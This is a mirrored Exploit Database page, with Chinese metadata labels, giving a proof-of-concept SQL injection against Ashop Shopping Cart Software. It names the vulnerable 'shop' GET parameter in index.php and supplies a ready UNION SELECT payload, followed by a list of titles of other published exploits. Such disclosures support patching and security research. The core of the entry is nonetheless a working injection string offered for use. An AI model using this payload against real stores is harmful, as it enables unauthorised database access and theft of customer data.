Ashop Shopping Cart Software – SQL Injection

Exploit Database
16 阅读

作者： Ahmet Ümit BAYRAM

日期： 2019-04-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46643/

# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 03.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php?cat=1&exp=&shop=1
Vulnerable Parameter: shop (GET)
Payload: cat=1&exp=&shop=-5438') UNION ALL SELECT
CONCAT(0x71786b6a71,0x6357557777645143654a726369774c4167665278634a46617758614d66506b46434f4b7669565054,0x716a787671),NULL--
fmIb

last Exploits
Ashop Shopping Cart Software – SQL Injection的更多信息

Nova CMS – Directory Traversal：
Monstra CMS 1.2.0 – ‘login’ SQL Injection：
Snitz Forums 2000 – ‘TOPIC_ID’ SQL Injection：
PrestaShop 1.4.4.1 – ‘/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php?Expedition’ Cross-Site Scripting：
WordPress Plugin Slider REvolution 4.1.4 – Arbitrary File Download：
OpenEMR 5.0.2.1 – Remote Code Execution：
Selea Targa IP OCR-ANPR Camera – Developer Backdoor Config Overwrite：
Apache Httpd mod_proxy – Error Page Cross-Site Scripting：